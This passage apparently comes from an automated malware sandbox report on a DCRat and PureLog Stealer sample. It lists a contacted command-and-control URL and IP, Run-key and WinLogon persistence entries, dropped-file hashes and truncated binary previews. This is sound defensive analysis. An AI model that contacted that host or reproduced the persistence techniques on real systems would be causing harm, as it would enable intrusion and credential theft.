                                    C:\ProgramData\nFQRHbQjcuhfqIAubZpdQD.exe83%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe83%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\EEEoXuLc.log8%ReversingLabs
                                    C:\Users\user\Desktop\WWLLRmVS.log24%ReversingLabs
                                    C:\Users\user\Desktop\izhrsOEp.log8%ReversingLabs
                                    C:\Users\user\Desktop\tYJQSSrA.log24%ReversingLabs
                                    C:\hyperContaineragent\Bridgecommon.exe83%ReversingLabsByteCode-MSIL.Trojan.DCRat

                                    Unpacked PE Files

                                    No Antivirus matches

                                    Domains

                                    No Antivirus matches

                                    URLs

                                    SourceDetectionScannerLabelLink
                                    http://861848cm.nyashkoon.ru/providerimageUpdateGameDatalifelocal.php100%Avira URL Cloudmalware

                                    Domains and IPs

                                    Contacted Domains

                                    NameIPActiveMaliciousAntivirus DetectionReputation
                                    861848cm.nyashkoon.ru
                                    		37.44.238.250
                                    		truetrue
                                      		unknown

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      http://861848cm.nyashkoon.ru/providerimageUpdateGameDatalifelocal.phptrue
                                      • Avira URL Cloud: malware
                                      		unknown

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://g.live.com/odclientsettings/Prod.C:svchost.exe, 00000033.00000003.2014632536.00000216FD67A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000033.00000003.2014632536.00000216FD56E000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://nuget.org/NuGet.exepowershell.exe, 0000001B.00000002.3178907715.0000020690078000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3193885665.0000017991AF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.3255400804.00000206D76D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.3097644752.0000028590078000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://g.live.com/odclientsettings/ProdV2svchost.exe, 00000033.00000003.2014632536.00000216FD622000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000023.00000002.2052697586.000001C4AA558000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96svchost.exe, 00000033.00000003.2014632536.00000216FD622000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000001B.00000002.2030090059.0000020680228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2032310159.0000017981CA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2043071591.000001E5DFEB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2049783465.00000206C7888000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2028020495.0000028580228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2052697586.000001C4AA558000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000023.00000002.2052697586.000001C4AA558000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000001B.00000002.2030090059.0000020680228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2032310159.0000017981CA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2043071591.000001E5DFEB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2049783465.00000206C7888000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2028020495.0000028580228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2052697586.000001C4AA558000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://contoso.com/powershell.exe, 00000021.00000002.3097644752.0000028590078000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://nuget.org/nuget.exepowershell.exe, 0000001B.00000002.3178907715.0000020690078000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3193885665.0000017991AF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.3255400804.00000206D76D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.3097644752.0000028590078000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://contoso.com/Licensepowershell.exe, 00000021.00000002.3097644752.0000028590078000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://contoso.com/Iconpowershell.exe, 00000021.00000002.3097644752.0000028590078000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 00000033.00000003.2014632536.00000216FD603000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000033.00000003.2014632536.00000216FD654000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://aka.ms/pscore68powershell.exe, 0000001B.00000002.2030090059.0000020680001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2032310159.0000017981A81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2043071591.000001E5DFC91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2049783465.00000206C7661000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2028020495.0000028580001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2052697586.000001C4AA331000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameBridgecommon.exe, 00000005.00000002.1911325001.0000000003CB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2030090059.0000020680001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2032310159.0000017981A81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2043071591.000001E5DFC91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2049783465.00000206C7661000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2028020495.0000028580001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2052697586.000001C4AA331000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 00000033.00000003.2014632536.00000216FD622000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://github.com/Pester/Pesterpowershell.exe, 00000023.00000002.2052697586.000001C4AA558000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high

                                                                        World Map of Contacted IPs

                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs

                                                                        Public IPs

                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        37.44.238.250
                                                                        		861848cm.nyashkoon.ruFrance
                                                                        		49434HARMONYHOSTING-ASFRtrue

                                                                        Private

                                                                        IP
                                                                        127.0.0.1

                                                                        General Information

                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                        Analysis ID:1549729
                                                                        Start date and time:2024-11-05 23:51:07 +01:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 10m 23s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                        Number of analysed new started processes analysed:58
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:0
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Sample name:3AAyq819Vy.exe
                                                                        renamed because original name is a hash value
                                                                        Original Sample Name:059DD6A8CB2D31871BB82DBB158965FA.exe
                                                                        Detection:MAL
                                                                        Classification:mal100.spre.troj.expl.evad.winEXE@53/56@1/2
                                                                        EGA Information:
                                                                        • Successful, ratio: 25%
                                                                        HCA Information:Failed
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .exe

                                                                        Warnings

                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe, schtasks.exe
                                                                        • Excluded IPs from analysis (whitelisted): 184.28.90.27
                                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                                                        • Execution Graph export aborted for target Bridgecommon.exe, PID 1816 because it is empty
                                                                        • Execution Graph export aborted for target Bridgecommon.exe, PID 7052 because it is empty
                                                                        • Execution Graph export aborted for target Bridgecommon.exe, PID 7780 because it is empty
                                                                        • Execution Graph export aborted for target nFQRHbQjcuhfqIAubZpdQD.exe, PID 6624 because it is empty
                                                                        • Execution Graph export aborted for target nFQRHbQjcuhfqIAubZpdQD.exe, PID 7104 because it is empty
                                                                        • Execution Graph export aborted for target nFQRHbQjcuhfqIAubZpdQD.exe, PID 7636 because it is empty
                                                                        • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                        • VT rate limit hit for: 3AAyq819Vy.exe

                                                                        Simulations

                                                                        Behavior and APIs

                                                                        TimeTypeDescription
                                                                        17:52:22API Interceptor166x Sleep call for process: powershell.exe modified
                                                                        17:52:31API Interceptor2264545x Sleep call for process: nFQRHbQjcuhfqIAubZpdQD.exe modified
                                                                        17:52:32API Interceptor2x Sleep call for process: svchost.exe modified
                                                                        22:52:21Task SchedulerRun new task: Bridgecommon path: "C:\hyperContaineragent\Bridgecommon.exe"
                                                                        22:52:21Task SchedulerRun new task: BridgecommonB path: "C:\hyperContaineragent\Bridgecommon.exe"
                                                                        22:52:22Task SchedulerRun new task: nFQRHbQjcuhfqIAubZpdQD path: "C:\Program Files (x86)\windows sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe"
                                                                        22:52:22Task SchedulerRun new task: nFQRHbQjcuhfqIAubZpdQDn path: "C:\Program Files (x86)\windows sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe"
                                                                        22:52:23AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run nFQRHbQjcuhfqIAubZpdQD "C:\Program Files (x86)\windows sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe"
                                                                        22:52:32AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Bridgecommon "C:\hyperContaineragent\Bridgecommon.exe"
                                                                        22:52:41AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run nFQRHbQjcuhfqIAubZpdQD "C:\Program Files (x86)\windows sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe"
                                                                        22:52:49AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Bridgecommon "C:\hyperContaineragent\Bridgecommon.exe"
                                                                        22:52:57AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run nFQRHbQjcuhfqIAubZpdQD "C:\Program Files (x86)\windows sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe"
                                                                        22:53:07AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run Bridgecommon "C:\hyperContaineragent\Bridgecommon.exe"
                                                                        22:53:24AutostartRun: WinLogon Shell "C:\Users\All Users\SoftwareDistribution\nFQRHbQjcuhfqIAubZpdQD.exe"
                                                                        22:53:32AutostartRun: WinLogon Shell "C:\Program Files\Internet Explorer\en-GB\nFQRHbQjcuhfqIAubZpdQD.exe"
                                                                        22:53:41AutostartRun: WinLogon Shell "C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe"
                                                                        22:53:50AutostartRun: WinLogon Shell "C:\Users\All Users\nFQRHbQjcuhfqIAubZpdQD.exe"
                                                                        22:53:59AutostartRun: WinLogon Shell "C:\Program Files (x86)\windows sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe"
                                                                        22:54:08AutostartRun: WinLogon Shell "C:\hyperContaineragent\Bridgecommon.exe"

                                                                        Joe Sandbox View / Context

                                                                        IPs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        37.44.238.250HcEvQKWAu2.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                        • 427176cm.nyashkoon.in/providerlinerequestpollSecureHttppublictempcentral.php
                                                                        k1iZHyRK6K.exeGet hashmaliciousDCRatBrowse
                                                                        • 452132cm.n9shteam2.top/Processdownloads.php
                                                                        FuWRu2Mg82.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                        • 114936cm.nyashcrack.top/EternalHttpprocessauthdbwordpressUploads.php
                                                                        cGZV10VyWC.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                        • aidvwbpa.top/pipeprocessauthBigloadprotectlocal.php
                                                                        qZoQEFZUnv.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                        • rollsroys.top/externaljsapisql.php
                                                                        QDJA9geR12.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                        • merlion.top/PythongameTrafficDatalifepublic.php
                                                                        Q9AQFOA6YC.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                        • 492668cm.newnyash.top/ToSecureLowProcessordefaultDatalifeCentral.php
                                                                        T3xpD9ZaYu.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                        • 024171cm.newnyash.top/authgameapiserverlinuxTestcdnDownloads.php
                                                                        bR9BxUAkJW.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                        • nazvanie.top/ExternalVmPythonrequestsecurepacketBigloadlocalprivatetemporary.php
                                                                        Q13mrh42kO.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                        • 267991cm.n9shka.top/videoLowCpugameBigloadProtectuniversalCentralDownloads.php

                                                                        Domains

                                                                        No context

                                                                        ASNs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        HARMONYHOSTING-ASFRHcEvQKWAu2.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                        • 37.44.238.250
                                                                        k1iZHyRK6K.exeGet hashmaliciousDCRatBrowse
                                                                        • 37.44.238.250
                                                                        FuWRu2Mg82.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                        • 37.44.238.250
                                                                        cGZV10VyWC.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                        • 37.44.238.250
                                                                        qZoQEFZUnv.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                        • 37.44.238.250
                                                                        QDJA9geR12.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                        • 37.44.238.250
                                                                        Q9AQFOA6YC.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                        • 37.44.238.250
                                                                        T3xpD9ZaYu.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                        • 37.44.238.250
                                                                        bR9BxUAkJW.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                        • 37.44.238.250
                                                                        Q13mrh42kO.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                        • 37.44.238.250

                                                                        JA3 Fingerprints

                                                                        No context

                                                                        Dropped Files

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        C:\Users\user\Desktop\EEEoXuLc.logTGh6AUbQkh.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                          k1iZHyRK6K.exeGet hashmaliciousDCRatBrowse
                                                                            VfKk5EmvwW.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                              cGZV10VyWC.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                PbfYaIvR5B.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                  9D7RwuJrth.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                    qZoQEFZUnv.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                      01YP9Lwum8.exeGet hashmaliciousDCRatBrowse
                                                                                        w49A5FG3yg.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                          9XHFe6y4Dj.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse

                                                                                            Created / dropped Files

                                                                                            C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\039065625c59a1

                                                                                            Download File
                                                                                            Process:C:\hyperContaineragent\Bridgecommon.exe
                                                                                            File Type:ASCII text, with very long lines (524), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):524
                                                                                            Entropy (8bit):5.889850339409401
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:hwgxpoNcKif0QpI3zxjH6NDLKrzufQlJx9Gc8iyF:hhmW0QpAzxjAbgL8f
                                                                                            MD5:6FB8551195B4CDBDEEAE50638921A769
                                                                                            SHA1:ABA997EDCECB1BF891F604D82E1D32A35F16C8A3
                                                                                            SHA-256:2E3A8F21CB40B082A841E6651048874ED18A1801B322BBFFE80B2CE655903959
                                                                                            SHA-512:40846EC2A8AE7A17DBF9F72D308037B95E679DBD4318C9ACE2F8F5AAB90A14BC5B765095FA38A32094C72BCA5B6641DE2A0A9F5B4BB781642FEB97D46856F0AA
                                                                                            Malicious:false
                                                                                            Preview:63MxKHPqFKnHCVLPAeCfi9sDsl1z1dJnVfjoikz9BfSUKUUtLEet3d87LJEjQaymBAvgwhrZpCdCrX3YQIow9at2hmcZgPtlqqTJiy6oXFE095QyQqTIvCmlQ39KER3ZT2VAEtzcL9Y4V22lVoIz6kzoDs3oywjFLogGjPth107vnsPXBXyaJDctDr7WzKnYaSsrWvBG4l8FnDAUcfnb7J6ILxD2RXrqNiVUAhBPVsghEWFAqn3TgMbRWkfisJyg4S2FrpU5eYFPmZDysDLoeXKBHE8aCcgM4AnweASAS8zIGMo6gq0p7JBgI17nq32B13UmvRUruLWgiB45ZB4Vm1Pv8GomCoUYFyQN1CLOWI4wxe8G7CNo9hYAnjnpnrpF07btvqDX0p8d6d8eIipAbpZhZQjSYflpdy5zCOUQ80xUj5DKlJhEBooLh4UfGv9VDT9HhIb3NZBk1E8eMZrO8hnyKtSI4zJM0cRP55mcrn1lnDTd60SrEuWgpK7x0T9XQyuYxsiQxOgU

                                                                                            C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe

                                                                                            Download File
                                                                                            Process:C:\hyperContaineragent\Bridgecommon.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):1719296
                                                                                            Entropy (8bit):7.457136013265021
                                                                                            Encrypted:false
                                                                                            SSDEEP:24576:/KEYWAa5pLMzdFGZWWs5cRtb6kMgmrmtXVdaNjTXf3qtzdzkkJj6:/p1JAz5cjb6k4cFdaNjTXfa/
                                                                                            MD5:477DB3DE46B7779B63495A8BDB279F2C
                                                                                            SHA1:77DC3F7D83728294C49298DB82DD0E668ADC3A73
                                                                                            SHA-256:8B0B6F7BA3C1C98FDC17CEB74E37057793E104DC92AA4D4319D71411B3E56366
                                                                                            SHA-512:4AC940FA7CE3C8A2A646639A5B00C5C8A1DCAFCFBA460782068446A321455CF5AF10E1E6AE4E6753150BEAB7D2431A7C38192787B32C4E508B73F4B3AC843956
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe, Author: Joe Security
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 83%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....%!g.................4..........~R... ...`....@.. ....................................@.................................0R..K....`.. ............................................................................ ............... ..H............text....2... ...4.................. ..`.rsrc... ....`.......6..............@....reloc...............:..............@..B................`R......H.......................L...Hq...Q.......................................0..........(.... ........8........E....M.......)...N...8H...(.... ....~....{....:....& ....8....(.... ....~....{....:....& ....8....*(.... ....~....{....:....& ....8y......0.......... ........8........E....d.......*...............8_......... ....~....{....9....& ....8....~....(S... .... .... ....s....~....(W....... ........8{...8.... ....~....{....:f...& ....8[...~....:V... ....8G.......~....([...~....(_

                                                                                            C:\Program Files\Internet Explorer\en-GB\039065625c59a1

                                                                                            Download File
                                                                                            Process:C:\hyperContaineragent\Bridgecommon.exe
                                                                                            File Type:ASCII text, with very long lines (488), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):488
                                                                                            Entropy (8bit):5.872764463062388
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:sm0gyHf4q5q2ePZgbQo4UzXzGQoXycUGqOkT+6z0qQOh:6gefj02nb/njG9icnqTTvKOh
                                                                                            MD5:00FBBE994B7F8CB16A9F42AB23AC511E
                                                                                            SHA1:A7928423DCA74B706C82E49C0DD3E9F1DDAB9767
                                                                                            SHA-256:5E5E22EEDE0B796F492521018CFA95F74F779E24CCB7D04E349B51F9E4FC7711
                                                                                            SHA-512:30CDD709576B9143527FF94FE6053A77513DA459DB4604C49DFE8BA30489CFED9C0E509A83050ED858A017AB4D63B7DEFE34852F2E6778DEDA192215F283D1D5
                                                                                            Malicious:false
                                                                                            Preview:c73qweKUMIXdUg4iG2WKL1RTsX22Aep2Hkf7HI7TWbHXcHq24vxS16Slpj7YmRTrdeWuB6b84Dxuu31kq98OqWAKR3ShKiqFHZ47u617UzYyIi1vrXsmSEBGeMcHo3yVWsmU93ztIA418MBtCgzw0EwCYxdieuTbBCba5hwyi8dSKJISKsEHDBfS5j5LaQPYrcz6ukyfuBO2ke2OpLYvpLYAgJfVlkXRtFksUMhj4jXBwnrarqgP2dsgEzZlFc3Jo6Je4K4coy1FyWN3bEn4EHZPWDnex5dbpNW0eMghwElDmnrrmfJBy8Fgh4I0gZosUZZl9XZPhGI9gVmtV52SwcmrH0SjEqAWZ3sNNGrOF4ds0FALRYekhW62wsdJEzK0GwknnYgPOnM1841BzGSqMZyC70aemhKPunlDfWi31OW3JE321cT7heoq7hqw7Bmqd7HVSxgdiYy7C5326inKNMrQ85F7qv5zmqaM6ijD

                                                                                            C:\Program Files\Internet Explorer\en-GB\nFQRHbQjcuhfqIAubZpdQD.exe

                                                                                            Download File
                                                                                            Process:C:\hyperContaineragent\Bridgecommon.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):1719296
                                                                                            Entropy (8bit):7.457136013265021
                                                                                            Encrypted:false
                                                                                            SSDEEP:24576:/KEYWAa5pLMzdFGZWWs5cRtb6kMgmrmtXVdaNjTXf3qtzdzkkJj6:/p1JAz5cjb6k4cFdaNjTXfa/
                                                                                            MD5:477DB3DE46B7779B63495A8BDB279F2C
                                                                                            SHA1:77DC3F7D83728294C49298DB82DD0E668ADC3A73
                                                                                            SHA-256:8B0B6F7BA3C1C98FDC17CEB74E37057793E104DC92AA4D4319D71411B3E56366
                                                                                            SHA-512:4AC940FA7CE3C8A2A646639A5B00C5C8A1DCAFCFBA460782068446A321455CF5AF10E1E6AE4E6753150BEAB7D2431A7C38192787B32C4E508B73F4B3AC843956
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 83%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....%!g.................4..........~R... ...`....@.. ....................................@.................................0R..K....`.. ............................................................................ ............... ..H............text....2... ...4.................. ..`.rsrc... ....`.......6..............@....reloc...............:..............@..B................`R......H.......................L...Hq...Q.......................................0..........(.... ........8........E....M.......)...N...8H...(.... ....~....{....:....& ....8....(.... ....~....{....:....& ....8....*(.... ....~....{....:....& ....8y......0.......... ........8........E....d.......*...............8_......... ....~....{....9....& ....8....~....(S... .... .... ....s....~....(W....... ........8{...8.... ....~....{....:f...& ....8[...~....:V... ....8G.......~....([...~....(_

                                                                                            C:\ProgramData\039065625c59a1

                                                                                            Download File
                                                                                            Process:C:\hyperContaineragent\Bridgecommon.exe
                                                                                            File Type:ASCII text, with very long lines (536), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):536
                                                                                            Entropy (8bit):5.904247601588873
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:f+SRBtvpBQgCX1PYkCIXkdrr9UML4mrYPjQaiwVqTCl6:f+oBtLQgCVYGANUMLabiwV7M
                                                                                            MD5:C4407ED3EB90D4AF87B0CBFFDE8FA498
                                                                                            SHA1:D86B8871DA25C131CAC4D03BFF591E2466A30F89
                                                                                            SHA-256:1BDA73484393A9EF47CF91F434C6C746B640561C160645F14710889CF1A75DA0
                                                                                            SHA-512:54AD02B43CBB205814936AB7322396B8E46516685DBFCB3D014B532AB212BEB76E896546AA2AF18FD2954E25657D323FE41510077C4C7FFAC716475D5249108C
                                                                                            Malicious:false
                                                                                            Preview:bIGFvku8ymYodVzT5qORB40NC0n91YBH50yqnSBHyS8lIpMqWweI7vfhR3D46uGalRtmgIqmoGdt5PFWo7nF33KJVQYuOHLDMhA16jJNG2d1SvlCxrQ8HBhrGjQPu5Xh4ZhXONZExa8AZS1joW6h1N6KASuXT3dKf662OOxkRLKqCgRxrqkX90qrdWX6dCv37yfdW9VaiWPpCPIeA6pmSFKpQOY201GPaRtNAybsVKynkApNO25gWIk2o0MHkcjrP9Ovg4dMf7QIQhEPjLn85j3Rq1jJlTH2kHYkw4rUYsBY1clGw7iZylwpG6EpUUlL0YiJJddoeTjMieaNPcXnvsE8UsezzC9EH0id3c7Se34fCjHlg1Z167ZHUkya8nzcTfFr56UwfEJ2xi6vl2S8mHHKabJTogU0EcLhdZpkgmW2xhUvnCzFU0zLX5QewAI8uTxUXZRLNsbAvPW3GYplrOfNn9JiJKxfdXIet9XOvn2mYzaIiWYYUhRgxkrYPsCC56gXG1KHAbzDV3yxiBAwwYK6

                                                                                            C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0x0b12d815, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                            Category:dropped
                                                                                            Size (bytes):1310720
                                                                                            Entropy (8bit):0.42217142137608876
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:ZSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Zaza/vMUM2Uvz7DO
                                                                                            MD5:50962E64EEDEBEE925F72C52C4E65409
